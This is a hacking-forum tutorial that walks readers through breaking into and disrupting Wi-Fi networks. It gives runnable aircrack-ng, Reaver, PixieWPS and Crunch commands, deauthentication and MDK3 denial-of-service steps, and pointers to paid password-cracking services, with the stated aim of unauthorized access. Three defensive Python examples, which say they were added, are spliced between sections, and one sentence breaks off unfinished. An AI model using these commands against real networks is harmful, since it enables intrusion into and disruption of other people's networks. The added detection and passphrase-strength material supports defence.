Raymond Reddington

[TuT] Introduction to Wi-Fi Hacking - WEP/WPA/WPA2 - ARP Injection, Bruteforce & MDK3

Posted 10-04-2022, 05:40 PM

Introduction to Wi-Fi Hacking
Introduction to WEP/WPA/WPA2 Protocol and Common Attack Vectors


I.) Introduction
Wireless hacking can be defined as an attack on wireless networks or access points in order to obtain confidential information such as authentication credentials, Wi-Fi passwords, admin portal access, and similar data. Wireless hacking is performed to gain unauthorized access to a private Wi-Fi network.

Here is some common terminology we shall be using throughout the guide:
  • AP: An access point is a device that creates a wireless local area network, or WLAN, usually in an office or large building. An access point connects to a wired router, switch, or hub via an Ethernet cable, and projects a Wi-Fi signal to a designated area.
  • BSSID: BSSID stands for Basic Service Set Identifier; it is the MAC (physical) address of the access point or wireless router that clients connect to.
  • ESSID: ESSID stands for Extended Service Set Identification, which basically means the identifying name of the wireless network akin to a radio station “call sign” if you will.
  • Channel: WiFi channels are smaller bands within the WiFi frequency bands that your wireless network uses to send and receive data. Depending on which frequency band your router is using, you have a certain number of WiFi channels to choose from: there are 11 WiFi channels in the 2.4 GHz frequency band.
  • WPS: WPS stands for Wi-Fi Protected Setup, a network security standard that simplifies the process of connecting devices to a wireless network. It helps users add devices to their Wi-Fi networks in seconds by skipping the need to enter long passwords.
  • wlan0: wlan0 refers to a wireless network interface of your PC, which usually means a card installed inside your PC that is used to connect to a network.
  • wlan0mon: The monitor-mode interface created from wlan0 by software such as Aircrack-ng.

II.) Requirements
  • Kali Linux installation, via native OS, virtual machine or live CD.
  • WiFi adapter capable of packet injection, strong signal reception and monitor mode support. An ideal choice would be a NetGear or Alfa adapter, but you can make do with low-end TP-LINK adapters too.
  • Aircrack-ng*
  • Reaver*
  • PixieWPS*
  • Crunch*
  • AirGeddon
  • WifiPhisher
  • LinSet
  • WireSpy
  • MDK3*
  • WifiSlax OS Suite (optional)

    * indicates that it should be pre-installed in security-focused Linux distributions such as Kali Linux or Parrot.

III.) Setup

Before proceeding with our attack routes, we shall setup the wireless interface with monitor mode.

Code
airmon-ng
airmon-ng start wlan0
ifconfig wlan0mon down
macchanger -a wlan0mon
ifconfig wlan0mon up

[Image: k1kv9kw.jpg]

[Image: MtPhQuN.jpg]

IV.) Attacking WEP via ARP Injection
  • Wired Equivalent Privacy (WEP) was a security algorithm for 802.11 wireless networks. Introduced as part of the original IEEE 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network. It has been largely made redundant by the new and improved WPA/WPA2 authentication; however, the fact remains that cracking WEP is a piece of cake to this day.

  • Scan for APs
    Code
    airodump-ng wlan0mon

    [Image: cV5ylps.jpg]

  • Run airodump-ng on the target AP to collect packets:
    Code
    airodump-ng --bssid <target bssid> -c <target channel number> -w output wlan0mon

    [Image: UAkkY9N.jpg]

  • Run aireplay-ng to attempt authentication with the access point:
    Code
    aireplay-ng -1 5 -e <target essid> -a <target ap bssid> -h <monitor interface mac> wlan0mon

    [Image: 3G0bCwY.jpg]

  • Run aireplay-ng in ARP request replay mode to inject packets:
    Code
    aireplay-ng -3 -b <target ap bssid> -h <monitor interface mac> wlan0mon

    [Image: 9XVpy28.jpg]

  • Wait until around 30-40k data packets have been gathered.

  • Run aircrack-ng to recover the WEP key from the collected packets (airodump-ng -w output names its capture file output-01.cap):
    Code
    aircrack-ng output-01.cap

    [Image: 4hXUncH.jpg]

V.) Attacking WPA/WPA2 via Reaver-WPS
  • Reaver implements a brute force attack against WiFi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.

  • Start by scanning for vulnerable WiFi networks:
    Code
    wash -i wlan0mon

    [Image: ad2oQ64.png]

  • Run a bruteforce attack via Reaver to get the PIN and crack the password. This step will take some time and depends heavily on the signal strength and on the target router.
    Code
    reaver -i wlan0mon -b <target bssid> -vv -c <target channel number>

    [Image: MXU4tGa.png]

  • If you happen to already have access to the pin, you can run the following command to save time:
    Code
    reaver -i wlan0mon -b <target bssid> -vv -c <target channel number> -p <PIN target ap>

  • Reaver-WPS should work for most WiFi networks protected by WPA/WPA2 as long as WPS doesn't have any additional security measures in place.
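  Sections V and VI both rest on one fact: a WPS PIN is eight digits, but its last digit is a checksum and the registrar protocol confirms the two halves separately, so the 10^7 valid PINs collapse to 11,000 candidates. The Python below is an added example (not part of the original post and not Reaver's or PixieWPS's code) that implements the WPS checksum from the WPS specification, validates PINs, and shows the search-space arithmetic so an administrator can judge what "additional security measures" on the router actually buy; the rate figures passed in are constructed values.

```python
def wps_checksum_digit(first7: str) -> int:
    """Checksum digit defined by the WPS specification for 8-digit PINs."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected the first 7 digits of a WPS PIN")
    d = [int(c) for c in first7]
    accum = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(pin[:7]) == int(pin[7])


def wps_search_space(halves_confirmed_separately: bool) -> int:
    """Worst-case number of PIN attempts.
    False: the PIN would have to be guessed whole (10^7 valid PINs).
    True:  the protocol acknowledges the first half on its own, so an
           attacker tries 10^4 first halves, then 10^3 second halves
           (the 8th digit is fixed by the checksum)."""
    if not halves_confirmed_separately:
        return 10 ** 7
    return 10 ** 4 + 10 ** 3


def worst_case_hours(attempts: int, seconds_per_attempt: float) -> float:
    """How long exhausting `attempts` takes at a given per-attempt cost."""
    return attempts * seconds_per_attempt / 3600


def attempts_before_lockout(lockout_after: int, lockout_minutes: float,
                            seconds_per_attempt: float, hours: float) -> int:
    """Attempts possible in `hours` when the AP locks WPS for `lockout_minutes`
    after every `lockout_after` failures (the kind of 'additional security
    measure' the tutorial mentions). Assumes a constructed, idealised lockout."""
    cycle_seconds = lockout_after * seconds_per_attempt + lockout_minutes * 60
    return int(hours * 3600 / cycle_seconds) * lockout_after


if __name__ == "__main__":
    print("12345670 valid:", is_valid_wps_pin("12345670"))       # classic default PIN
    print("candidates:", wps_search_space(True), "vs", wps_search_space(False))
    # constructed: ~1.5 s per attempt over the air
    print("hours, no lockout:", round(worst_case_hours(wps_search_space(True), 1.5), 1))
    print("attempts in 24h with lockout:", attempts_before_lockout(3, 60, 1.5, 24))
```

  At a constructed 1.5 seconds per attempt the 11,000 candidates fall in under five hours, while a lockout of one hour after three failures caps an attacker at a few dozen attempts per day; disabling WPS entirely removes the search space altogether, which is why it is the usual recommendation.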

VI.) Attacking WPA/WPA2 via PixieWPS
  • PixieWPS is a tool written in C that brute-forces the WPS PIN offline by exploiting the low or non-existent entropy of some APs' WPS implementations (the pixie dust attack).

  • Initiate a scan for vulnerable WiFi networks:
    Code
    wash -i wlan0mon

  • Initiate a pixie dust attack to bruteforce the PIN
    Code
    reaver -i wlan0mon -b <target ap bssid> -KvvNwL -c <target channel number>

    [Image: EUaJVT4.png]

  • After successfully cracking the WPS PIN, initiate an attack to bruteforce the WPA key.
    Code
    reaver -i wlan0mon -b <target ap bssid> -vvNwL -c <target channel number> -p <PIN>

    [Image: 955pNlG.png]


VII.) Bruteforce Attack via Aircrack-ng
  • Alternatively, you can use aircrack-ng to run a bruteforce attack on the WiFi password.

  • Keep in mind this will depend upon the wordlists you have available and it may not be necessary that

  • We start by scanning for available access points:
    Code
    airodump-ng wlan0mon

  • Once we have a target access point, we lock airodump-ng onto its channel and BSSID and write the capture to a file:
    Code
    airodump-ng -c <channel number> --bssid <targeted bssid> -w output wlan0mon

  • Our next step is capturing the WPA/WPA2 handshake. This requires a client to connect (or reconnect) to the target AP, so we send deauthentication frames to make existing clients reconnect:
    Code
    aireplay-ng -0 10 -a <target bssid> wlan0mon

  • Our only option here is to wait until we see the connection. Mobile devices are your best bet as they connect/disconnect often to an access point.

    [Image: GmhOrzy.png]

    [Image: zyvkXv1.png]

  • You will now require a wordlist; there is a default wordlist called "rockyou.txt" included in Kali Linux. The wordlist contains 14,344,392 common passwords. You can alternatively download wordlists from the web or from hash-cracking communities.

  • Initiate a command to bruteforce the WPA/WPA2 password via aircrack-ng.
    Code
    aircrack-ng output-01.cap -w rockyou.txt

  • When you have a successful match, it should return the required password.

    [Image: ZVKe6So.png]
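  What aircrack-ng is doing for each wordlist entry is deriving the WPA/WPA2-Personal Pairwise Master Key, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 iterations, and checking it against the captured handshake. The Python below is an added example (not from the original post or from Aircrack-ng) that performs that derivation with Python's standard library, checks it against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"), and turns the page's rockyou figure and a constructed guess rate into the numbers that matter when choosing a passphrase.

```python
import hashlib
import math

ROCKYOU_ENTRIES = 14_344_392          # wordlist size quoted in this tutorial


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def ssid_salts_the_key(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """Same passphrase, different SSID -> different PMK. This is why a
    precomputed table only helps against the exact SSID it was built for."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


def hours_to_exhaust(candidates: int, guesses_per_second: float) -> float:
    """Wall-clock time to try every candidate at a given guess rate."""
    return candidates / guesses_per_second / 3600


def random_passphrase_candidates(charset_size: int, length: int) -> int:
    """Search space of a uniformly random passphrase, the case a wordlist cannot cover."""
    return charset_size ** length


def entropy_bits(charset_size: int, length: int) -> float:
    return length * math.log2(charset_size)


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")          # IEEE 802.11i test vector
    print("PMK:", pmk.hex())
    print("SSID changes the key:", ssid_salts_the_key("password", "IEEE", "ieee"))
    rate = 100_000.0                              # constructed: guesses/s on a modern GPU
    print("rockyou exhausted in hours:", round(hours_to_exhaust(ROCKYOU_ENTRIES, rate), 2))
    space = random_passphrase_candidates(62, 12)  # 12 random alphanumerics
    print("12-char random, years:", round(hours_to_exhaust(space, rate) / 24 / 365))
    print("entropy bits:", round(entropy_bits(62, 12), 1))
```

  The numbers make the precaution at the end of the tutorial concrete: the 4096 PBKDF2 iterations only slow a guess down by a constant factor, so a passphrase that is in a public wordlist falls in minutes at a realistic rate, while a random 12-character one takes longer than the hardware will exist.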

  • To create a private wordlist using Crunch, use the following steps:
    • Crunch is a wordlist-generating tool that comes pre-installed with Kali Linux. It is used to generate custom wordlists from a character set or pattern, and can generate all possible permutations and combinations of a provided keyword.
    • For example, you can run the following command:
      Code
      crunch 8 8 0123456789 -t Mark@@@@ -o output.txt

    • This shall create a list named "output.txt" with the following content:
      Code
      Mark0000
      Mark0001
      Mark0002
      Mark0003
      Mark0004
      Mark0005
      ... until ...
      Mark9997
      Mark9998
      Mark9999

      I'll list a few basic usage commands for the Crunch utility below:

    • To create a wordlist of all one- and two-digit numbers:
      Code
      crunch 1 2 0123456789 -o output.txt

    • To generate a wordlist using the RainbowCrack charset file:
      Code
      crunch 2 3 -f /usr/share/rainbowcrack/charset.txt

    • To generate wildcard pattern permutations upon a base keyword (the pattern is 9 characters long, so the minimum and maximum length must both be 9):
      Code
      crunch 9 9 -t mark^%%%% -o output.txt
      • , (comma) for all uppercase letters
      • @ for all lowercase letters
      • % for all numeric characters
      • ^ for all special characters

    • To generate a wordlist of all permutations of the given words or characters:
      Code
      crunch 1 10 -p hello world -o output.txt

VIII.) Introduction to the Evil Twin Attack
  • An evil twin attack is primarily an information-gathering attack. It leverages an "evil twin" of an existing Wi-Fi network (a new access point that looks just like the legitimate one) to trick users into providing sensitive information, whether by directly asking for it or by monitoring all network traffic flowing through the evil twin.
  • Within an evil twin attack, we select our target AP, and make a clone of it on the same channel as the original with the same BSSID and ESSID without encryption. It is effectively a phishing technique for WiFi cracking.
  • The most common tools used for evil twin attacks include Airgeddon, WiFiPhisher, LinSet and WireSpy to name a few. Since this method is fairly complex, I shall elaborate upon it within a future tutorial after explaining the concept here.
  • The primary scenario for an evil twin attack is prompting the user to re-enter their password under false pretenses, such as a firmware or security update. The password thus received is forwarded to us, effectively social-engineering the target user into handing over access to the target AP themselves.
  • The illustration below explains the Evil Twin Attack perfectly:

    [Image: GZ4Y9ka.jpg]

IX.) Introduction to MDK3

MDK3 is a proof-of-concept tool to exploit common IEEE 802.11 (Wi-Fi) protocol weaknesses. Features include:
  • Bruteforce MAC Filters.
  • Bruteforce hidden SSIDs (some small SSID wordlists included).
  • Probe networks to check if they can hear you.
  • Intelligent Authentication-DoS to freeze APs (with success checks).
  • FakeAP - Beacon Flooding with channel hopping (can crash NetStumbler and some buggy drivers)
  • Disconnect everything (aka AMOK-MODE) with Deauthentication and Disassociation packets.
  • WPA TKIP Denial-of-Service.
  • WDS Confusion - Shuts down large scale multi-AP installations.
  • To start with MDK3, we shall disrupt the network via the following commands:
    Code
    mdk3 wlan0mon a -a <target bssid> -n <target essid> -s 100
    mdk3 wlan0mon x 0 -t <target bssid ap> -n <target essid> -s 100

  • Initiate the following command to invoke the AMOK-MODE to deauthenticate existing users:
    Code
    mdk3 wlan0mon d -t <target bssid>

    [Image: JV20uFD.png]

  • For best results, combine this with an evil twin attack, bruteforce or pixie dust attack.
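  Both the aireplay-ng -0 step in section VII and MDK3's AMOK mode above work by forging deauthentication and disassociation frames in the AP's name, which is also what makes them easy to spot from the defending side: a legitimate AP sends the occasional unicast deauth, never dozens per second to the broadcast address. The Python below is an added example (not part of the original post, and not code from Aircrack-ng or MDK3) of the detection logic a wireless IDS would run over decoded management frames; the frame records are constructed sample data in the form (timestamp, subtype, source, destination), and the window and threshold are assumed values to tune for your environment.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = "deauth", "disassoc", "beacon"
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP = "aa:bb:cc:dd:ee:01"          # constructed BSSID of the defended AP

# Constructed sample capture: (timestamp in seconds, subtype, source, destination)
SAMPLE_FRAMES = (
    [(9.0 + i * 0.1, BEACON, AP, BROADCAST) for i in range(20)]        # normal beaconing
    + [(9.5, DEAUTH, "aa:bb:cc:dd:ee:02", "11:22:33:44:55:66")]         # one genuine unicast deauth
    + [(10.0 + i * 0.05, DEAUTH, AP, BROADCAST) for i in range(15)]     # 15 forged deauths in 0.7 s
)


def detect_deauth_floods(frames, window=2.0, threshold=10):
    """Flag every source address that emits at least `threshold` deauth or
    disassoc frames inside a sliding `window` of seconds. The source is the
    address being impersonated, so an alert on your own BSSID means someone
    is forging frames in its name. Returns {source: details}."""
    recent = defaultdict(deque)     # per-source timestamps inside the window
    alerts = {}
    for t, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append(t)
        while t - q[0] > window:    # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {
                "first": q[0],
                "last": t,
                "count": len(q),
                "broadcast": dst == BROADCAST,   # forged floods usually target everyone
            }
    return alerts


def format_alert(src: str, details: dict) -> str:
    kind = "broadcast" if details["broadcast"] else "unicast"
    return (f"deauth flood from {src}: {details['count']} frames in "
            f"{details['last'] - details['first']:.2f}s ({kind})")


if __name__ == "__main__":
    for src, details in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(format_alert(src, details))
```

  Detection tells you the attack is happening; the mitigation is 802.11w (Protected Management Frames), which authenticates deauthentication and disassociation frames so that forged ones are discarded by clients, and is available on most current APs and client devices.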

X.) Alternatives & Conclusion

That concludes the tutorial for now. Below I mention a few alternative methods for Android users to monitor the security of their own WiFi networks and to attempt attacks on vulnerable WiFi networks without using Kali.
  • For rooted Android devices, you should be able to use WPA Tester to crack the passwords of WPS-enabled WiFi routers. This will also work on non-rooted devices however you wouldn't be able to effectively crack the passphrases.
  • You can also use online services such as the Distributed WPA PSK Auditor or OnlineHashCrack to crack the required WPA/WPA2 passphrases.
  • You could use paid hash-cracking services such as GPUHash or the Paid Hash Bounties and Rewards subforum.
  • Basic precautions to secure your WiFi against these methods include using WPA2 encryption, strong passphrases (you can use a strong password generator), hiding your ESSID, enforcing a maximum client limit, and enabling MAC address filtering on your network.
  • You can use a tool such as Who's On My Wifi or the NirSoft Wireless Network Watcher
  • For Spanish-speaking users, there is the unofficial WiFiSlax Linux distribution, which should have all the necessary tools preinstalled. Since the developers of WifiSlax are based in Spain, Spanish is the only OS language they support for now.


    Thank you to everyone who's tuned in for this tutorial suite. As always, my tutorials have been for purely educational purposes and I will try to bring forward more tutorials regarding attack techniques such as the evil twin discussed and a new concept (MiTM) within this tutorial suite. Happy hacking!
